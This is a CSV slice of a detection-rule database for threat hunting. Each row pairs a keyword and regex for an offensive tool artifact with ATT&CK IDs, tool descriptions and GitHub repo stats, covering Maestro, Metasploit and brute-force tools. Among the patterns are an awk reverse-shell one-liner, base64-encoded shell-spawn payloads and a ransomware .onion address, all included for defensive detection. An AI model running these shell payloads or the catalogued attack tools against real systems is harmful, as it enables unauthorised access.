"*avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion*",".{0,1000}avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34345"
"*avrdude -c usbasp -p m328p -U flash:w:avr.hex*",".{0,1000}avrdude\s\-c\susbasp\s\-p\sm328p\s\-U\sflash\:w\:avr\.hex.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","34346"
"*avred-main.zip*",".{0,1000}avred\-main\.zip.{0,1000}","offensive_tool_keyword","avred","Avred is being used to identify which parts of a file are identified by a Antivirus and tries to show as much possible information and context about each match.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/dobin/avred","1","1","N/A","N/A","9","5","465","55","2025-02-26T08:12:03Z","2022-05-19T12:12:34Z","34347"
"*av-update-urls.txt*",".{0,1000}av\-update\-urls\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34348"
"*aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp*",".{0,1000}aW1wb3J0IG9zOyBvcy5leGVjbCgiL2Jpbi9zaCIsICJzaCIsICItcCIp.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","N/A","N/A","9","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","34349"
"*aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vc2gnKQ==*",".{0,1000}aW1wb3J0IHB0eTtwdHkuc3Bhd24oJy9iaW4vc2gnKQ\=\=.{0,1000}","offensive_tool_keyword","metasploit","bash reverse shell default base64 from metasploit","T1059 - T1071 - T1573","TA0011 - TA0002","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","C2","https://github.com/rapid7/metasploit-framework","1","0","#base64 #linux","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34350"
"*aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ*",".{0,1000}aW52YWxpZF91c2VyQGNvbnRvc28uY29tOlBhc3N3b3JkMQ.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#base64","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","34351"
"*Aw8KAw4LDgvZDgLUz2rLC2rPBMC*",".{0,1000}Aw8KAw4LDgvZDgLUz2rLC2rPBMC.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","34352"
"*AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph*",".{0,1000}AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","34353"
"*await DeleteIntuneCommand.Exe*",".{0,1000}await\sDeleteIntuneCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34354"
"*await DeleteIntuneScriptCommand.Exe*",".{0,1000}await\sDeleteIntuneScriptCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34355"
"*await ExecIntuneAppCommand.Exe*",".{0,1000}await\sExecIntuneAppCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34356"
"*await ExecIntuneCommand.Exe*",".{0,1000}await\sExecIntuneCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34357"
"*await ExecIntuneDeviceQueryCommand.Exe*",".{0,1000}await\sExecIntuneDeviceQueryCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34358"
"*await ExecIntuneScriptCommand.Exe*",".{0,1000}await\sExecIntuneScriptCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34359"
"*await ExecIntuneSyncCommand.Exe*",".{0,1000}await\sExecIntuneSyncCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34360"
"*await GetAccessTokenCommand.Exe*",".{0,1000}await\sGetAccessTokenCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34361"
"*await GetEntraCommand.Exe*",".{0,1000}await\sGetEntraCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34362"
"*await GetEntraGroupsCommand.Exe*",".{0,1000}await\sGetEntraGroupsCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34363"
"*await GetEntraUsersCommand.Exe*",".{0,1000}await\sGetEntraUsersCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34364"
"*await GetIntuneAppsCommand.Exe*",".{0,1000}await\sGetIntuneAppsCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34365"
"*await GetIntuneCommand.Exe*",".{0,1000}await\sGetIntuneCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34366"
"*await GetIntuneDevicesCommand.Exe*",".{0,1000}await\sGetIntuneDevicesCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34367"
"*await GetIntuneScriptsCommand.Exe*",".{0,1000}await\sGetIntuneScriptsCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34368"
"*await GetPrtCookieCommand.Exe*",".{0,1000}await\sGetPrtCookieCommand\.Exe.{0,1000}","offensive_tool_keyword","Maestro","Maestro is a post-exploitation tool that simplifies interaction with Intune/EntraID from a C2 agent on a user's workstation bypassing the need for user password knowledge - token manipulation or Azure authentication processes","T1550.004 - T1078 - T1087 - T1071 - T1102","TA0006 - TA0003 - TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/Maestro","1","0","N/A","behavior detections opportunities here https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30","9","4","333","33","2025-02-11T23:02:00Z","2024-01-15T18:45:50Z","34369"
"*awesome-cve-poc*",".{0,1000}awesome\-cve\-poc.{0,1000}","offensive_tool_keyword","POC","list of poc exploitation for nown CVE","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tool","https://github.com/qazbnm456/awesome-cve-poc","1","1","N/A","N/A","N/A","10","3390","725","2022-01-04T19:07:43Z","2017-02-02T06:43:14Z","34372"
"*Awesome-Hacking*",".{0,1000}Awesome\-Hacking.{0,1000}","offensive_tool_keyword","Awesome-Hacking","A collection of awesome lists for hackers. pentesters & security researchers.","T1566 - T1590 - T1204 - T1210 - T1212 - T1213","TA0002 - TA0003 - TA0008 - TA0009","N/A","N/A","Exploitation tool","https://github.com/Hack-with-Github/Awesome-Hacking","1","1","N/A","N/A","N/A","10","91563","9230","2025-01-18T01:48:02Z","2016-03-30T15:47:10Z","34373"
"*Awesome-Hacking-Resources*",".{0,1000}Awesome\-Hacking\-Resources.{0,1000}","offensive_tool_keyword","Awesome-Hacking-Resources","A collection of hacking / penetration testing resources to make you better!","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Exploitation tool","https://github.com/vitalysim/Awesome-Hacking-Resources","1","1","N/A","N/A","N/A","10","15815","2139","2024-03-12T00:19:30Z","2017-10-10T19:09:18Z","34374"
"*awesome-osint*",".{0,1000}awesome\-osint.{0,1000}","offensive_tool_keyword","awesome-osint","A curated list of amazingly awesome open source intelligence tools and resources. Open-source intelligence (OSINT) is intelligence collected from publicly available sources. In the intelligence community (IC). the term open refers to overt. publicly available sources (as opposed to covert or clandestine sources)","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Reconnaissance","https://github.com/jivoi/awesome-osint","1","1","N/A","N/A","N/A","10","21018","3021","2025-04-20T17:31:01Z","2016-11-30T13:26:11Z","34375"
"*awesome-pentest*",".{0,1000}awesome\-pentest.{0,1000}","offensive_tool_keyword","awesome-pentest","A collection of awesome penetration testing and offensive cybersecurity resources.","T1200 - T1210 - T1213 - T1583 - T1589","TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/enaqx/awesome-pentest","1","1","N/A","N/A","N/A","10","22911","4542","2024-12-14T12:02:31Z","2014-08-03T23:13:53Z","34376"
"*awesome-pentest-cheat-sheets*",".{0,1000}awesome\-pentest\-cheat\-sheets.{0,1000}","offensive_tool_keyword","awesome-pentest-cheat-sheets","Collection of cheat sheets useful for pentesting","T1583 - T1598 - T1596","TA0001 - TA0008 - TA0043","N/A","N/A","Exploitation tool","https://github.com/coreb1t/awesome-pentest-cheat-sheets","1","0","N/A","N/A","N/A","10","4010","781","2024-02-16T13:38:52Z","2016-11-29T00:00:18Z","34377"
"*awesome-scapy*",".{0,1000}awesome\-scapy.{0,1000}","offensive_tool_keyword","awesome-scapy","A Python tool and library for low level packet creation and manipulation","T1571 - T1596 - T1567 - T1569","TA0002 - TA0009 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/secdev/awesome-scapy","1","1","N/A","N/A","N/A","3","277","42","2024-08-29T09:42:39Z","2020-02-04T12:17:35Z","34378"
"*awesome-static-analysis*",".{0,1000}awesome\-static\-analysis.{0,1000}","offensive_tool_keyword","awesome-static-analysis","This is a collection of static analysis tools and code quality checkers","T1064 - T1027 - T1029 - T1518","TA0003 - TA0002 - TA0043","N/A","N/A","Exploitation tool","https://github.com/codefactor-io/awesome-static-analysis","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34379"
"*awesome-web-security*",".{0,1000}awesome\-web\-security.{0,1000}","offensive_tool_keyword","awesome-web-security","Curated list of Web Security materials and resources.Needless to say. most websites suffer from various types of bugs which may eventually lead to vulnerabilities. Why would this happen so often? There can be many factors involved including misconfiguration. shortage of engineers' security skills. etc. To combat this. here is a curated list of Web Security materials and resources for learning cutting edge penetration techniques. and I highly encourage you to read this article So you want to be a web security researcher? first","T1190 - T1191 - T1192 - T1210 - T1213","TA0002 - TA0003 - TA0007","N/A","N/A","Vulnerability Scanner","https://github.com/qazbnm456/awesome-web-security","1","1","N/A","N/A","N/A","10","11873","1696","2024-02-22T00:28:07Z","2017-01-29T16:50:21Z","34380"
"*awesome-windows-domain-hardening*",".{0,1000}awesome\-windows\-domain\-hardening.{0,1000}","offensive_tool_keyword","awesome-windows-domain-hardening","A curated list of awesome Security Hardening techniques for Windows with additional links to exploitation tools","T1563 - T1059 - T1547 - T1057 - T1574","TA0002 - TA0008 - TA0003 - TA0007 - TA0011","N/A","N/A","Exploitation tool","https://github.com/PaulSec/awesome-windows-domain-hardening","1","0","N/A","N/A","N/A","10","1768","267","2020-01-07T19:56:18Z","2017-02-19T19:20:38Z","34381"
"*awk 'BEGIN {s = ""/inet/tcp/0/*"";*printf ""shell>"" |& s;*getline*print $0 |& s;*close*}' /dev/null*",".{0,1000}awk\s\'BEGIN\s\{s\s\=\s\""\/inet\/tcp\/0\/.{0,1000}\""\;.{0,1000}printf\s\""shell\>\""\s\|\&\ss\;.{0,1000}getline.{0,1000}print\s\$0\s\|\&\ss\;.{0,1000}close.{0,1000}\}\'\s\/dev\/null.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","N/A","10","10","3312","702","2024-10-31T22:38:04Z","2021-02-27T00:53:13Z","34382"
"*awk_reverse_tcp.py*",".{0,1000}awk_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","34383"
"*AWS Account Bruteforce Ratelimit! Sleeping for *",".{0,1000}AWS\sAccount\sBruteforce\sRatelimit!\sSleeping\sfor\s.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","N/A","N/A","9","1","29","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z","34384"
"*aws configure --profile exegol*",".{0,1000}aws\sconfigure\s\-\-profile\sexegol.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","34385"
"*AWS_BUCKET=nemesis-test*",".{0,1000}AWS_BUCKET\=nemesis\-test.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","34386"
"*AWS_KMS_KEY_ALIAS=nemesis-dev*",".{0,1000}AWS_KMS_KEY_ALIAS\=nemesis\-dev.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","34387"
"*awsloot.py *",".{0,1000}awsloot\.py\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","0","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","34388"
"*axcrypt2john.py*",".{0,1000}axcrypt2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","34389"
"*aydinnyunus/PassDetective*",".{0,1000}aydinnyunus\/PassDetective.{0,1000}","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","1","N/A","N/A","7","2","129","8","2024-06-19T10:39:39Z","2023-07-22T12:31:57Z","34390"
"*azfvgayqKwtFApcvyRedpUXculaeCCGA*",".{0,1000}azfvgayqKwtFApcvyRedpUXculaeCCGA.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","0","N/A","N/A","9","2","151","27","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z","34391"
"*azizjon.m@gmail.com*",".{0,1000}azizjon\.m\@gmail\.com.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","#email","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","34393"
"*Azure-AccessPermissions.ps1*",".{0,1000}Azure\-AccessPermissions\.ps1.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","34394"
"*Azure-AccessPermissions-master*",".{0,1000}Azure\-AccessPermissions\-master.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","N/A","AD Enumeration","6","2","108","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z","34395"
"*AzureAD AutoLogon Brute*",".{0,1000}AzureAD\sAutoLogon\sBrute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","0","N/A","N/A","N/A","2","101","20","2024-06-27T12:23:42Z","2021-10-01T05:20:25Z","34396"
"*AzureAD_Autologon_Brute*",".{0,1000}AzureAD_Autologon_Brute.{0,1000}","offensive_tool_keyword","AzureAD_Autologon_Brute","Brute force attack tool for Azure AD Autologon","T1110 - T1078 - T1114 - T1087","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/AzureAD_Autologon_Brute","1","1","N/A","N/A","N/A","2","101","20","2024-06-27T12:23:42Z","2021-10-01T05:20:25Z","34397"
"*AzureAD_Decrypt_MSOL.ps1*",".{0,1000}AzureAD_Decrypt_MSOL\.ps1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","34398"
"*azuread_decrypt_msol_*.ps1*",".{0,1000}azuread_decrypt_msol_.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","powershell","method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync","T1003.006","TA0006","N/A","N/A","Credential Access","https://gist.github.com/analyticsearch/7453d22d737e46657eb57c44d5cf4cbb","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34399"
